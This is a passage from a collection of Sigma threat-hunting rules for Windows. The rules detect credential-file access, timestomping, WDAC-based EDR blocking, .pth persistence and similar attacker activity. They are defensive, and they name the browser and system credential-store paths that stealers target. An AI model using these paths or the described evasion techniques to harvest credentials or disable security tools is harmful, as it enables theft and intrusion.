    "content": "title: Access To Chromium Browsers Sensitive Files By Uncommon Applications\nid: c5f37810-a85f-4186-81e9-33f23abb4141\nstatus: test\ndescription: |\n    Detects file access requests to chromium based browser sensitive files by uncommon processes.\n    Could indicate potential attempt of stealing sensitive information.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\User Data\\Default\\Cookies'\n            - '\\User Data\\Default\\History'\n            - '\\User Data\\Default\\Network\\Cookies'\n            - '\\User Data\\Default\\Web Data'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_browsers_credential.yml",
    "content": "title: Access To Browser Credential Files By Uncommon Applications\nid: 91cb43db-302a-47e3-b3c8-7ede481e27bf\nrelated:\n    - id: 4b60e527-ec73-4b47-8cb3-f02ad927ca65\n      type: similar\nstatus: test\ndescription: |\n    Detects file access requests to browser credential stores by uncommon processes.\n    Could indicate potential attempt of credential stealing.\n    Requires heavy baselining before usage\nreferences:\n    - https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users\n    - https://github.com/lclevy/firepwd\nauthor: frack113, X__Junior (Nextron Systems)\ndate: 2022-04-09\nmodified: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection_ie:\n        FileName|endswith: '\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat'\n    selection_firefox:\n        FileName|endswith:\n            - '\\cookies.sqlite'\n            - '\\places.sqlite'\n            - 'release\\key3.db'  # Firefox\n            - 'release\\key4.db'  # Firefox\n            - 'release\\logins.json' # Firefox\n    selection_chromium:\n        FileName|contains:\n            - '\\User Data\\Default\\Login Data'\n            - '\\User Data\\Local State'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_office_outlook_mail_credential.yml",
    "content": "title: Access To Windows Outlook Mail Files By Uncommon Applications\nid: fc3e237f-2fef-406c-b90d-b3ae7e02fa8f\nstatus: test\ndescription: |\n    Detects file access requests to Windows Outlook Mail by uncommon processes.\n    Could indicate potential attempt of credential stealing.\n    Requires heavy baselining before usage\nreferences:\n    - https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2\n    - https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows\nauthor: frack113\ndate: 2024-05-10\nmodified: 2024-07-29\ntags:\n    - attack.t1070.008\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection_unistore:\n        FileName|contains: '\\AppData\\Local\\Comms\\Unistore\\data'\n    selection_unistoredb:\n        FileName|endswith: '\\AppData\\Local\\Comms\\UnistoreDB\\store.vol'\n    filter_main_system:\n        Image: 'System'\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\n# Note: Increase after initial baseline\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_gpo_access_uncommon_process.yml",
    "content": "title: Access To Sysvol Policies Share By Uncommon Process\nid: 8344c19f-a023-45ff-ad63-a01c5396aea0\nstatus: test\ndescription: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes\nreferences:\n    - https://github.com/vletoux/pingcastle\nauthor: frack113\ndate: 2023-12-21\ntags:\n    - attack.credential-access\n    - attack.t1552.006\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|startswith: '\\\\'\n        FileName|contains|all:\n            - '\\sysvol\\'\n            - '\\Policies\\'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\system32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_reg_and_hive.yml",
    "content": "title: Access To .Reg/.Hive Files By Uncommon Applications\nid: 337a31c6-46c4-46be-886a-260d7aa78cac\nstatus: test\ndescription: Detects file access requests to files ending with either the \".hive\"/\".reg\" extension, usually associated with Windows Registry backups.\nreferences:\n    - https://github.com/tccontre/Reg-Restore-Persistence-Mole\nauthor: frack113\ndate: 2023-09-15\nmodified: 2024-07-29\ntags:\n    - attack.t1112\n    - attack.defense-evasion\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith:\n            - '.hive'\n            - '.reg'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_unattend_xml.yml",
    "content": "title: Unattend.XML File Access Attempt\nid: 76a26006-0942-430b-8249-bd51d448f8e5\nstatus: test\ndescription: |\n    Detects attempts to access the \"unattend.xml\" file, where credentials might be stored.\n    This file is used during the unattended windows install process.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_access\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith: '\\Panther\\unattend.xml'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_change/file_change_win_date_changed_to_another_year.yml",
    "content": "title: File Creation Date Changed to Another Year\nid: 558eebe5-f2ba-4104-b339-36f7902bcc1a\nstatus: test\ndescription: |\n    Detects when the file creation time is changed to a year before 2020.\n    Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\n    Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n    In order to use this rule in production, it is recommended first baseline normal behavior in your environment and then tune the rule accordingly.\n    Hunting Recommendation: Focus on files with creation times set to years significantly before the current date, especially those in user-writable directories.\n    Correlate with process execution logs to identify the source of the modification and investigate any unsigned or suspicious binaries involved.\nreferences:\n    - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-12\nmodified: 2026-01-20\ntags:\n    - attack.t1070.006\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_change\n    product: windows\ndetection:\n    selection:\n        PreviousCreationUtcTime|startswith: '202'\n    filter_main_creation_time:\n        CreationUtcTime|startswith: '202'\n    filter_main_program_files:\n        - TargetFilename|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n        - Image|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n    filter_optional_updates:\n        - Image:\n              - 'C:\\Windows\\system32\\ProvTool.exe'\n              - 'C:\\Windows\\System32\\usocoreworker.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - TargetFilename|startswith: 'C:\\ProgramData\\USOPrivate\\UpdateStore\\'\n        - TargetFilename|endswith:\n              - '.tmp'\n              - '.temp'\n    filter_optional_cab:\n        Image|startswith: 'C:\\WINDOWS\\System32\\'\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\svchost.exe'\n            - '\\sihclient.exe'\n        TargetFilename|endswith: '.cab'\n    filter_optional_msiexec:\n        Image: 'C:\\Windows\\system32\\msiexec.exe'\n    filter_optional_vcredist:\n        Image|startswith: 'C:\\Windows\\Temp\\'\n        Image|endswith: '\\VCREDI~1.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Changes made to or by the local NTP service\n    - Software installations and updates\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_delete/file_delete_win_zone_identifier_ads.yml",
    "content": "title: ADS Zone.Identifier Deleted\nid: 7eac0a16-5832-4e81-865f-0268a6d19e4b\nrelated:\n    - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae\n      type: similar\nstatus: test\ndescription: Detects the deletion of the \"Zone.Identifier\" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.\nreferences:\n    - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\nauthor: frack113\ndate: 2023-09-04\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith: ':Zone.Identifier'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_dump_file_creation.yml",
    "content": "title: DMP/HDMP File Creation\nid: 3a525307-d100-48ae-b3b9-0964699d7f97\nstatus: test\ndescription: Detects the creation of a file with the \".dmp\"/\".hdmp\" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: selection\nfalsepositives:\n    - Likely during crashes of software\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_pfx_file_creation.yml",
    "content": "title: PFX File Creation\nid: dca1b3e8-e043-4ec8-85d7-867f334b5724\nstatus: test\ndescription: |\n    Detects the creation of PFX files (Personal Information Exchange format).\n    PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:\n\n        - Exfiltrate digital certificates for impersonation or signing malicious code\n        - Establish persistent access through certificate-based authentication\n        - Bypass security controls that rely on certificate validation\n\n    Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/14\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1552.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.pfx'\n    filter_optional_onedrive:\n        Image:\n            - 'C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n            - 'C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe'\n        TargetFilename|endswith: '\\OneDrive\\CodeSigning.pfx'\n    filter_optional_visual_studio:\n        TargetFilename|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_cmake:\n        TargetFilename|startswith: 'C:\\Program Files\\CMake\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - System administrators legitimately managing certificates and PKI infrastructure\n    - Development environments where developers create test certificates for application signing\n    - Automated certificate deployment tools and scripts used in enterprise environments\n    - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)\n    - Certificate backup and recovery operations performed by IT staff\n    - Build systems and CI/CD pipelines that generate code signing certificates\n    - Third-party applications that create temporary certificates for secure communications\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - Windows\nid: e3652ba3-0ad8-4010-a957-b7ba369e7bac\nrelated:\n    - id: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce # Linux\n      type: similar\n    - id: 4f394635-13ef-4599-b677-3353e0f84f55 # MacOS\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\' # Covers both Virtual envs and default paths\n        TargetFilename|endswith: '.pth'\n    filter_main_python:\n        Image|endswith: '\\python.exe'\n        TargetFilename|endswith:\n            - '\\pywin32.pth' # VS Studio Python extension\n            - '\\distutils-precedence.pth'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_scheduled_task_creation.yml",
    "content": "title: Scheduled Task Created - FileCreation\nid: a762e74f-4dce-477c-b023-4ed81df600f9\nstatus: test\ndescription: Detects the creation of a scheduled task via file creation.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\n    - https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - attack.s0111\n    - car.2013-08-001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n    condition: selection\nfalsepositives:\n    - Normal behaviour on Windows\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_susp_binary_dropper.yml",
    "content": "title: Creation of an Executable by an Executable\nid: 297afac9-5d02-4138-8c58-b977bac60556\nstatus: test\ndescription: Detects the creation of an executable by another executable.\nreferences:\n    - Internal Research\nauthor: frack113\ndate: 2022-03-09\nmodified: 2025-02-24\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '.exe'\n        TargetFilename|endswith: '.exe'\n    filter_main_generic_1:\n        Image|endswith:\n            - ':\\Windows\\System32\\msiexec.exe'\n            - ':\\Windows\\system32\\cleanmgr.exe'\n            - ':\\Windows\\explorer.exe'\n            - ':\\WINDOWS\\system32\\dxgiadaptercache.exe'\n            - ':\\WINDOWS\\system32\\Dism.exe'\n            - ':\\Windows\\System32\\wuauclt.exe'\n    filter_main_update:\n        # Security_UserID: S-1-5-18\n        # Example:\n        #   TargetFilename: C:\\Windows\\SoftwareDistribution\\Download\\803d1df4c931df4f3e50a022cda56e88\\WindowsUpdateBox.exe\n        Image|endswith: ':\\WINDOWS\\system32\\svchost.exe'\n        TargetFilename|contains: ':\\Windows\\SoftwareDistribution\\Download\\'\n    filter_main_upgrade:\n        Image|endswith: ':\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            # Example:\n            #   This example was seen during windows upgrade\n            #   TargetFilename: :\\WUDownloadCache\\803d1df4c931df4f3e50a022cda56e29\\WindowsUpdateBox.exe\n            - ':\\WUDownloadCache\\'\n            - '\\WindowsUpdateBox.exe'\n    filter_main_windows_update_box:\n        # This FP was seen during Windows Upgrade\n        # ParentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wuauserv\n        Image|contains: ':\\WINDOWS\\SoftwareDistribution\\Download\\'\n        Image|endswith: '\\WindowsUpdateBox.Exe'\n        TargetFilename|contains: ':\\$WINDOWS.~BT\\Sources\\'\n    filter_main_tiworker:\n        Image|contains: ':\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_programfiles:\n        - Image|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n        - TargetFilename|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n    filter_main_defender:\n        Image|contains:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\'\n            - ':\\Program Files\\Windows Defender\\'\n    filter_main_windows_apps:\n        TargetFilename|contains: '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n    filter_main_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe'\n            - '\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\'\n    filter_main_mscorsvw:\n        # Example:\n        #   ParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems /LegacyServiceBehavior\n        #   Image: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4f8c-0\\MSBuild.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\49bc-0\\testhost.net47.x86.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\39d8-0\\fsc.exe\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\mscorsvw.exe'\n        TargetFilename|contains: ':\\Windows\\assembly\\NativeImages_'\n    filter_main_vscode:\n        Image|contains: '\\AppData\\Local\\'\n        Image|endswith: '\\Microsoft VS Code\\Code.exe'\n        TargetFilename|contains: '\\.vscode\\extensions\\'\n    filter_main_githubdesktop:\n        Image|endswith: '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n        # Example TargetFileName:\n        #   \\AppData\\Local\\SquirrelTemp\\tempb\\lib\\net45\\GitHubDesktop_ExecutionStub.exe\n        #   \\AppData\\Local\\SquirrelTemp\\tempb\\lib\\net45\\squirrel.exe\n        TargetFilename|contains: '\\AppData\\Local\\SquirrelTemp\\'\n    filter_main_windows_temp:\n        - Image|contains: ':\\WINDOWS\\TEMP\\'\n        - TargetFilename|contains: ':\\WINDOWS\\TEMP\\'\n    filter_optional_python:\n        Image|contains: '\\Python27\\python.exe'\n        TargetFilename|contains:\n            - '\\Python27\\Lib\\site-packages\\'\n            - '\\Python27\\Scripts\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_optional_squirrel:\n        Image|contains: '\\AppData\\Local\\SquirrelTemp\\Update.exe'\n        TargetFilename|contains: '\\AppData\\Local'\n    filter_main_temp_installers:\n        - Image|contains: '\\AppData\\Local\\Temp\\'\n        - TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n    filter_optional_chrome:\n        Image|endswith: '\\ChromeSetup.exe'\n        TargetFilename|contains: '\\Google'\n    filter_main_dot_net:\n        Image|contains: ':\\Windows\\Microsoft.NET\\Framework'\n        Image|endswith: '\\mscorsvw.exe'\n        TargetFilename|contains: ':\\Windows\\assembly'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    # Please contribute to FP to increase the level\n    - Software installers\n    - Update utilities\n    - 32bit applications launching their 64bit versions\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_vscode_tunnel_indicators.yml",
    "content": "title: VsCode Code Tunnel Execution File Indicator\nid: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d\nstatus: test\ndescription: |\n    Detects the creation of a file with the name \"code_tunnel.json\" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\code_tunnel.json'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of VsCode tunneling functionality will also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_wdac_policy_creation_in_codeintegrity_folder.yml",
    "content": "title: WDAC Policy File Creation In CodeIntegrity Folder\nid: 121b25f7-b9d6-4b37-afa0-cba317ec52f3\nstatus: experimental\ndescription: |\n    Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\\Windows\\System32\\CodeIntegrity\\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.\nreferences:\n    - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n    - https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2025-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: By default the file_event log source might not contain the IntegrityLevel of the Process. It should be collected in order to use this rule'\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Windows\\System32\\CodeIntegrity\\'\n        TargetFilename|endswith:\n            - '.cip'\n            - '.p7b'\n        IntegrityLevel: 'High'\n    condition: selection\nfalsepositives:\n    - May occur legitimately as part of admin activity, but rarely with interactive elevation.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_webdav_tmpfile_creation.yml",
    "content": "title: WebDAV Temporary Local File Creation\nid: 4c55738d-72d8-490e-a2db-7969654e375f\nrelated:\n    - id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398\n      type: similar\nstatus: test\ndescription: Detects the creation of WebDAV temporary files with potentially suspicious extensions\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\n    - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\nauthor: Micah Babinski\ndate: 2023-08-21\ntags:\n    - attack.initial-access\n    - attack.resource-development\n    - attack.t1584\n    - attack.t1566\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dat'\n            - '.ico'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.rar'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Legitimate use of WebDAV in an environment\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_rename/file_rename_win_non_dll_to_dll_ext.yml",
    "content": "title: Non-DLL Extension File Renamed With DLL Extension\nid: bbfd974c-248e-4435-8de6-1e938c79c5c1\nstatus: test\ndescription: |\n    Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.\nreferences:\n    - https://twitter.com/ffforward/status/1481672378639912960\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1036.008\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_rename\n    definition: 'Requirements: Microsoft-Windows-Kernel-File Provider with at least the KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH keyword'\ndetection:\n    selection:\n        TargetFilename|endswith: '.dll'\n    filter_main_dll:\n        # Note: To avoid file renames\n        SourceFilename|endswith: '.dll'\n    filter_main_installers:\n        SourceFilename|endswith: '.tmp'\n    filter_main_empty_source:\n        SourceFilename: ''\n    filter_main_null_source:\n        SourceFilename: null\n    filter_main_tiworker:\n        Image|contains: ':\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_upgrade:\n        - Image|endswith: ':\\Windows\\System32\\wuauclt.exe'\n        - TargetFilename|contains: ':\\$WINDOWS.~BT\\Sources\\'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n    filter_optional_squirrel:\n        SourceFilename|contains: '\\SquirrelTemp\\temp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely from installers and temporary locations\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_amsi_uncommon_process.yml",
